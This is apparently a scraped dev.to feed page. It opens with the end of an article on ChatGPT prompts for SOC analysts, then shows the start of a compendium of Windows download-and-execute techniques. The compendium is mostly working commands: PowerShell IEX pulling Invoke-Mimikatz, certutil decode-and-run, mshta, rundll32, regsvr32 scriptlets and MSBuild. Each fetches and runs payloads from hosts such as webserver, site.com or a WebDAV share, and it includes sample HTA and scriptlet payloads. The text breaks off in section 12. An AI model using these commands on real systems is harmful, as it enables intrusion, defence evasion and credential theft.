&lt;p&gt;Not all alerts can be resolved at the initial triage stage. When L1 analysts identify risks such as suspected account compromise, malware execution, suspicious administrative activity, or ransomware indicators, they must provide swift and clear escalation reports.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Prompt:&lt;/strong&gt; Using the following alert information and investigation results, draft a concise escalation report for L2 or L3 analysts. Clearly state observed phenomena, associated risks, completed verifications, and recommended next steps: [Paste investigation results here].&lt;/p&gt;

&lt;p&gt;This capability allows L1 analysts to communicate essential information efficiently, preventing critical details from being obscured by extraneous text. Well-structured escalation reports reduce back-and-forth queries and enable seamless handover to subsequent teams.&lt;/p&gt;

&lt;h2&gt;
  
  
  6. Suspicious Phishing Email Analysis
&lt;/h2&gt;

&lt;p&gt;Phishing remains a prevalent threat. Analysts must examine email content, sender information, headers, links, and social engineering tactics to determine whether an email constitutes a malicious attack or benign spam.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Prompt:&lt;/strong&gt; Analyse this suspicious phishing email. Identify various danger signals, common attacker techniques, suspicious indicators of compromise, and recommended remediation actions. Determine whether the email represents credential theft, malware delivery, business email compromise, or ordinary spam: [Paste/upload email headers, body, or links here].&lt;/p&gt;

&lt;p&gt;The prompt helps L1 analysts recognise spoofed senders, suspicious domains, urgency-based lures, identity masquerading, attachment risks, and malicious links. It also aids junior analysts in understanding typical phishing construction patterns.&lt;/p&gt;

&lt;h2&gt;
  
  
  7. Mapping Behaviours to the MITRE ATT&amp;amp;CK Framework
&lt;/h2&gt;

&lt;p&gt;The MITRE ATT&amp;amp;CK framework categorises adversary tactics, techniques, and procedures. L1 analysts often need to contextualise suspicious activity within the broader attack lifecycle.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Prompt:&lt;/strong&gt; Map the following observed behaviours to the corresponding MITRE ATT&amp;amp;CK tactics and techniques. Provide the rationale for each mapping and suggest supporting evidence: [Paste investigation results or event overview here].&lt;/p&gt;

&lt;p&gt;This approach helps analysts move beyond isolated alert analysis, adopt a holistic view of attacker behaviour, and improve report quality, threat hunting capabilities, and inter-team communication.&lt;/p&gt;

&lt;h2&gt;
  
  
  8. Developing Threat Hunting Hypotheses
&lt;/h2&gt;

&lt;p&gt;SOC work extends beyond reactive alert handling. In mature security environments, analysts leverage indicators of compromise to proactively search for signs of intrusion.&lt;/p&gt;

&lt;p&gt;While threat hunting has traditionally been the domain of senior analysts, the proliferation of AI tools in SOCs now enables L1 analysts to develop their skills and participate in proactive threat hunting and intelligence activities.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Prompt:&lt;/strong&gt; Based on this alert or suspicious behaviour, generate ten threat hunting hypotheses. For each, specify relevant data sources and search queries: [Paste/upload alert, indicators of compromise, or behaviour description here].&lt;/p&gt;

&lt;p&gt;Such prompts allow analysts to expand single-point detections into comprehensive environment-wide hunts. For instance, upon detecting suspicious PowerShell execution on one endpoint, AI can suggest analogous searches across endpoint logs, authentication logs, proxy logs, and DNS records.&lt;/p&gt;

&lt;h2&gt;
  
  
  9. Optimising or Designing SIEM Detection Rules
&lt;/h2&gt;

&lt;p&gt;Although not all L1 SOC analysts belong to detection engineering teams, many identify gaps in existing controls during investigations.&lt;/p&gt;

&lt;p&gt;AI tools such as ChatGPT can help structure thoughts and translate suspicious behaviours into more robust detection rules.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Prompt:&lt;/strong&gt; For the following suspicious behaviour, assist in creating or optimising a SIEM detection rule. Include detection logic, key fields to monitor, false-positive considerations, and tuning recommendations: [Describe the specific behaviour here].&lt;/p&gt;

&lt;p&gt;This is applicable to scenarios such as brute-force attacks, anomalous PowerShell usage, privilege escalation, unusual service creation, lateral movement, and irregular authentication patterns. It encourages analysts to adopt a defensive mindset, proactively enhancing visibility and refining rules rather than merely responding to alerts.&lt;/p&gt;

&lt;h2&gt;
  
  
  10. Drafting Non-Technical Executive Summaries
&lt;/h2&gt;

&lt;p&gt;Communication skills represent an often-underestimated core competency in SOC work. Analysts frequently need to explain security incidents to non-technical stakeholders, including managers, compliance teams, legal departments, and executives. Technical jargon can prove impenetrable to business audiences.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Prompt:&lt;/strong&gt; Based on the following investigation details, draft a non-technical executive summary for managers and senior leadership. Clearly explain the incident sequence, business impact, current handling status, and recommended actions. Avoid excessive technical terminology: [Paste/upload incident details here].&lt;/p&gt;

&lt;p&gt;This prompt helps analysts translate technical findings into business language — a critical skill, given that security incidents typically affect operations, finances, brand reputation, and regulatory compliance.&lt;/p&gt;

&lt;h2&gt;
  
  
  Important Reminder: Never Upload Sensitive Data to Public AI Tools
&lt;/h2&gt;

&lt;p&gt;Although tools such as ChatGPT can enhance SOC workflows, they must be used in a compliant and responsible manner. Unless explicitly authorised by the organisation, SOC analysts must refrain from pasting sensitive, confidential, regulated, or proprietary data into public AI systems.&lt;/p&gt;

&lt;p&gt;Prohibited data categories include: customer or employee personal information; account credentials and keys; internal IP addresses and asset inventories; proprietary log files; details of classified incidents; regulated or confidential materials; and internal investigation records containing identifiable system or user information.&lt;/p&gt;

&lt;p&gt;Safer practices involve data redaction or masking prior to use — removing usernames, hostnames, domains, email addresses, internal IPs, file hashes, and any other elements that could lead to information leakage.&lt;/p&gt;

&lt;p&gt;Ideally, SOC teams should utilise only enterprise-approved AI solutions that align with organisational legal, privacy, and security requirements.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;When employed responsibly and in accordance with established norms, ChatGPT and other AI tools can meaningfully improve the efficiency of SOC analysts. AI assists with the summarisation, organisation, archiving, interpretation, and dissemination of security information, thereby reducing repetitive tasks, standardising processes, and allowing analysts to concentrate on higher-value activities such as detection rule optimisation, threat hunting, and threat intelligence.&lt;/p&gt;

&lt;p&gt;Nevertheless, the practical value of AI within SOC environments ultimately depends on its manner of use. Analysts must continue to verify outputs, exercise independent judgement, and adhere strictly to internal procedures and playbooks.&lt;/p&gt;

&lt;p&gt;Artificial intelligence can accelerate workflows but will never fully supplant human expertise. For L1 SOC analysts seeking to enhance productivity, the prompts outlined above offer a practical entry point for incorporating AI into routine operations.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Disclaimer:&lt;/strong&gt; The techniques and methods described herein are intended solely for legitimate security research and educational purposes aimed at strengthening cybersecurity defences. Any unauthorised use for attacks or destructive activities is strictly prohibited and remains the sole legal responsibility of the perpetrator. This site bears no liability. For copyright or other concerns, please contact us via the provided channels.&lt;/p&gt;

</description>
      <category>security</category>
      <category>cybersecurity</category>
      <category>chatgpt</category>
      <category>soc</category>
    </item>
    <item>
      <title>A Comprehensive Compendium of Windows Download and Execution Commands</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Wed, 24 Jun 2026 11:41:24 +0000</pubDate>
      <link>https://dev.to/excalibra/a-comprehensive-compendium-of-windows-download-and-execution-commands-3hje</link>
      <guid>https://dev.to/excalibra/a-comprehensive-compendium-of-windows-download-and-execution-commands-3hje</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Article Abstract:&lt;/strong&gt; This article presents a systematic compilation of methods for downloading and executing files on Windows systems using various built-in commands, including bitsadmin, PowerShell, mshta, and others. These techniques are applicable to Windows 7 and later versions.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;1. bitsadmin Command (Windows 7 and Above)&lt;/li&gt;
&lt;li&gt;2. PowerShell Command Download and Execution (Windows 7 and Above)&lt;/li&gt;
&lt;li&gt;3. mshta Command Download and Execution&lt;/li&gt;
&lt;li&gt;4. rundll32 Command Download and Execution&lt;/li&gt;
&lt;li&gt;5. regasm Command from .NET Framework&lt;/li&gt;
&lt;li&gt;6. CMD Remote Command Download&lt;/li&gt;
&lt;li&gt;7. regsvr32 Command Download and Execution&lt;/li&gt;
&lt;li&gt;8. certutil Command Download and Execution&lt;/li&gt;
&lt;li&gt;9. MSBuild Command from .NET Framework&lt;/li&gt;
&lt;li&gt;10. odbcconf Command Download and Execution&lt;/li&gt;
&lt;li&gt;11. cscript Script Remote Command Download and Execution&lt;/li&gt;
&lt;li&gt;12. pubprn.vbs Download and Execution Command&lt;/li&gt;
&lt;li&gt;13. Native Windows copy Command&lt;/li&gt;
&lt;li&gt;14. IEXPLORE.EXE Command Download and Execution (Requires IE 0-day)&lt;/li&gt;
&lt;li&gt;15. IEExec Command Download and Execution&lt;/li&gt;
&lt;li&gt;16. msiexec Command Download and Execution&lt;/li&gt;
&lt;li&gt;17. GreatSCT Download and Execution Project&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  1. bitsadmin Command (Windows 7 and Above)
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;bitsadmin&lt;/code&gt; utility can only download files to a specified path on the local system.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;bitsadmin /transfer myDownLoadJob /download /priority normal &lt;span class="s2"&gt;"http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg"&lt;/span&gt; &lt;span class="s2"&gt;"d:&lt;/span&gt;&lt;span class="se"&gt;\a&lt;/span&gt;&lt;span class="s2"&gt;bc.jpg"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;bitsadmin /transfer d90f &amp;lt;http://site.com/a&amp;gt; %APPDATA%&lt;span class="se"&gt;\d&lt;/span&gt;90f.exe&amp;amp;%APPDATA%&lt;span class="se"&gt;\d&lt;/span&gt;90f.exe&amp;amp;del %APPDATA%&lt;span class="se"&gt;\d&lt;/span&gt;90f.exe
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  2. PowerShell Command Download and Execution (Windows 7 and Above)
&lt;/h2&gt;

&lt;p&gt;PowerShell provides powerful capabilities for downloading and executing scripts and binaries directly from remote sources.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;powershell IEX &lt;span class="o"&gt;(&lt;/span&gt;New-Object Net.WebClient&lt;span class="o"&gt;)&lt;/span&gt;.DownloadString&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'&amp;lt;https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1&amp;gt;'&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; Invoke-Mimikatz
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;powershell &lt;span class="nt"&gt;-exec&lt;/span&gt; bypass &lt;span class="nt"&gt;-f&lt;/span&gt; &lt;span class="se"&gt;\\&lt;/span&gt;webdavserver&lt;span class="se"&gt;\f&lt;/span&gt;older&lt;span class="se"&gt;\p&lt;/span&gt;ayload.ps1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;powershell &lt;span class="o"&gt;(&lt;/span&gt;new-object System.Net.WebClient&lt;span class="o"&gt;)&lt;/span&gt;.DownloadFile&lt;span class="o"&gt;(&lt;/span&gt; &lt;span class="s1"&gt;'http://192.168.168.183/1.exe'&lt;/span&gt;,&lt;span class="s1"&gt;'C:\1111111111111.exe'&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;powershell &lt;span class="nt"&gt;-w&lt;/span&gt; hidden &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;new-object System.Net.WebClient&lt;span class="o"&gt;)&lt;/span&gt;.Downloadfile&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg'&lt;/span&gt;,&lt;span class="s1"&gt;'d:\\1.jpg'&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  3. mshta Command Download and Execution
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;mshta&lt;/code&gt; command executes HTML Application (HTA) files, which can contain VBScript or JScript that performs download and execution.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;mshta vbscript:Close&lt;span class="o"&gt;(&lt;/span&gt;Execute&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"GetObject(""script:http://webserver/payload.sct"")"&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;

mshta http://webserver/payload.hta

mshta &lt;span class="se"&gt;\\&lt;/span&gt;webdavserver&lt;span class="se"&gt;\f&lt;/span&gt;older&lt;span class="se"&gt;\p&lt;/span&gt;ayload.hta
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Sample payload.hta:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight html"&gt;&lt;code&gt;&lt;span class="nt"&gt;&amp;lt;HTML&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;meta&lt;/span&gt; &lt;span class="na"&gt;http-equiv=&lt;/span&gt;&lt;span class="s"&gt;"Content-Type"&lt;/span&gt; &lt;span class="na"&gt;content=&lt;/span&gt;&lt;span class="s"&gt;"text/html; charset=utf-8"&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;HEAD&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;script &lt;/span&gt;&lt;span class="na"&gt;language=&lt;/span&gt;&lt;span class="s"&gt;"VBScript"&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="nx"&gt;Window&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;ReSizeTo&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
&lt;span class="nx"&gt;Window&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;moveTo&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;2000&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;2000&lt;/span&gt;
&lt;span class="nb"&gt;Set&lt;/span&gt; &lt;span class="nx"&gt;objShell&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;CreateObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;Wscript.Shell&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="nx"&gt;objShell&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;Run&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;calc.exe&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;
&lt;span class="nb"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;close&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;body&amp;gt;&lt;/span&gt;
demo
&lt;span class="nt"&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/HEAD&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/HTML&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  4. rundll32 Command Download and Execution
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;rundll32&lt;/code&gt; utility can execute functions exported from DLLs, including those hosted on remote WebDAV shares.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;rundll32 &lt;span class="se"&gt;\\&lt;/span&gt;webdavserver&lt;span class="se"&gt;\f&lt;/span&gt;older&lt;span class="se"&gt;\p&lt;/span&gt;ayload.dll,entrypoint

rundll32.exe javascript:&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;.&lt;/span&gt;&lt;span class="se"&gt;\m&lt;/span&gt;&lt;span class="s2"&gt;shtml,RunHTMLApplication"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="nv"&gt;o&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;GetObject&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"script:http://webserver/payload.sct"&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;window.close&lt;span class="o"&gt;()&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Reference:&lt;/strong&gt; &lt;a href="https://github.com/3gstudent/Javascript-Backdoor" rel="noopener noreferrer"&gt;https://github.com/3gstudent/Javascript-Backdoor&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  5. regasm Command from .NET Framework
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;regasm.exe&lt;/code&gt; tool, part of the .NET Framework, can be used to execute managed DLLs from remote locations.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework64&lt;span class="se"&gt;\v&lt;/span&gt;4.0.30319&lt;span class="se"&gt;\r&lt;/span&gt;egasm.exe /u &lt;span class="se"&gt;\\&lt;/span&gt;webdavserver&lt;span class="se"&gt;\f&lt;/span&gt;older&lt;span class="se"&gt;\p&lt;/span&gt;ayload.dll
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  6. CMD Remote Command Download
&lt;/h2&gt;

&lt;p&gt;The Windows Command Prompt can directly read and execute commands from a remote batch file.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cmd.exe /k &amp;lt; &lt;span class="se"&gt;\\&lt;/span&gt;webdavserver&lt;span class="se"&gt;\f&lt;/span&gt;older&lt;span class="se"&gt;\b&lt;/span&gt;atchfile.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  7. regsvr32 Command Download and Execution
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;regsvr32&lt;/code&gt; utility can register and execute COM objects from remote scriptlet files.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

regsvr32 /u /n /s /i:&lt;span class="se"&gt;\\&lt;/span&gt;webdavserver&lt;span class="se"&gt;\f&lt;/span&gt;older&lt;span class="se"&gt;\p&lt;/span&gt;ayload.sct scrobj.dll

regsvr32 /u /s /i:&amp;lt;http://site.com/js.png&amp;gt; scrobj.dll
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Sample js.png (Scriptlet):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight xml"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?XML version="1.0"?&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;scriptlet&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;registration&lt;/span&gt;
    &lt;span class="na"&gt;progid=&lt;/span&gt;&lt;span class="s"&gt;"ShortJSRAT"&lt;/span&gt;
    &lt;span class="na"&gt;classid=&lt;/span&gt;&lt;span class="s"&gt;"{10001111-0000-0000-0000-0000FEEDACDC}"&lt;/span&gt; &lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="c"&gt;&amp;lt;!-- Learn from Casey Smith @subTee --&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;script&lt;/span&gt; &lt;span class="na"&gt;language=&lt;/span&gt;&lt;span class="s"&gt;"JScript"&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
        &lt;span class="cp"&gt;&amp;lt;![CDATA[
            ps = "cmd.exe /c calc.exe";
            new ActiveXObject("WScript.Shell").Run(ps,0,true);
        ]]&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/registration&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/scriptlet&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  8. certutil Command Download and Execution
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;certutil&lt;/code&gt; utility, primarily used for certificate management, can also download files and decode Base64-encoded content.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;certutil &lt;span class="nt"&gt;-urlcache&lt;/span&gt; &lt;span class="nt"&gt;-split&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; http://webserver/payload payload
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;certutil &lt;span class="nt"&gt;-urlcache&lt;/span&gt; &lt;span class="nt"&gt;-split&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; http://webserver/payload.b64 payload.b64 &amp;amp; certutil &lt;span class="nt"&gt;-decode&lt;/span&gt; payload.b64 payload.dll &amp;amp; C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework64&lt;span class="se"&gt;\v&lt;/span&gt;4.0.30319&lt;span class="se"&gt;\I&lt;/span&gt;nstallUtil /logfile&lt;span class="o"&gt;=&lt;/span&gt; /LogToConsole&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;false&lt;/span&gt; /u payload.dll
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;certutil &lt;span class="nt"&gt;-urlcache&lt;/span&gt; &lt;span class="nt"&gt;-split&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; http://webserver/payload.b64 payload.b64 &amp;amp; certutil &lt;span class="nt"&gt;-decode&lt;/span&gt; payload.b64 payload.exe &amp;amp; payload.exe
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;certutil &lt;span class="nt"&gt;-urlcache&lt;/span&gt; &lt;span class="nt"&gt;-split&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; http://site.com/a a.exe &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; a.exe &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; del a.exe &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; certutil &lt;span class="nt"&gt;-urlcache&lt;/span&gt; &lt;span class="nt"&gt;-split&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; http://192.168.254.102:80/a delete
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  9. MSBuild Command from .NET Framework
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;MSBuild&lt;/code&gt; tool, part of the .NET Framework, can execute tasks defined in XML project files, enabling remote code execution.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cmd /V /c &lt;span class="s2"&gt;"set MB="&lt;/span&gt;C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework64&lt;span class="se"&gt;\v&lt;/span&gt;4.0.30319&lt;span class="se"&gt;\M&lt;/span&gt;SBuild.exe&lt;span class="s2"&gt;" &amp;amp; !MB! /noautoresponse /preprocess &lt;/span&gt;&lt;span class="se"&gt;\\&lt;/span&gt;&lt;span class="s2"&gt;webdavserver&lt;/span&gt;&lt;span class="se"&gt;\f&lt;/span&gt;&lt;span class="s2"&gt;older&lt;/span&gt;&lt;span class="se"&gt;\p&lt;/span&gt;&lt;span class="s2"&gt;ayload.xml &amp;gt; payload.xml &amp;amp; !MB! payload.xml"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  10. odbcconf Command Download and Execution
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;odbcconf&lt;/code&gt; utility can be used to register DLLs remotely via its &lt;code&gt;regsvr&lt;/code&gt; command.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;odbcconf /s /a &lt;span class="o"&gt;{&lt;/span&gt;regsvr &lt;span class="se"&gt;\\&lt;/span&gt;webdavserver&lt;span class="se"&gt;\f&lt;/span&gt;older&lt;span class="se"&gt;\p&lt;/span&gt;ayload_dll.txt&lt;span class="o"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  11. cscript Script Remote Command Download and Execution
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;cscript&lt;/code&gt; command executes VBScript or JScript scripts, which can be hosted remotely.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cscript //E:jscript &lt;span class="se"&gt;\\&lt;/span&gt;webdavserver&lt;span class="se"&gt;\f&lt;/span&gt;older&lt;span class="se"&gt;\p&lt;/span&gt;ayload.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Sample downfile.vbs:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;' Set your settings
strFileURL = "http://www.it1.net/images/it1_logo2.jpg"
strHDLocation = "c:\logo.jpg"

' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then
    Set objADOStream = CreateObject("ADODB.Stream")
    objADOStream.Open
    objADOStream.Type = 1 'adTypeBinary

    objADOStream.Write objXMLHTTP.ResponseBody
    objADOStream.Position = 0 'Set the stream position to the start

    Set objFSO = Createobject("Scripting.FileSystemObject")
    If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
    Set objFSO = Nothing

    objADOStream.SaveToFile strHDLocation
    objADOStream.Close
    Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Execution Command:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cscript downfile.vbs
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  12. pubprn.vbs Download and Execution Command
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;pubprn.vbs&lt;/code&gt; script, part of Windows printing administration, can execute remote scriptlet files.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
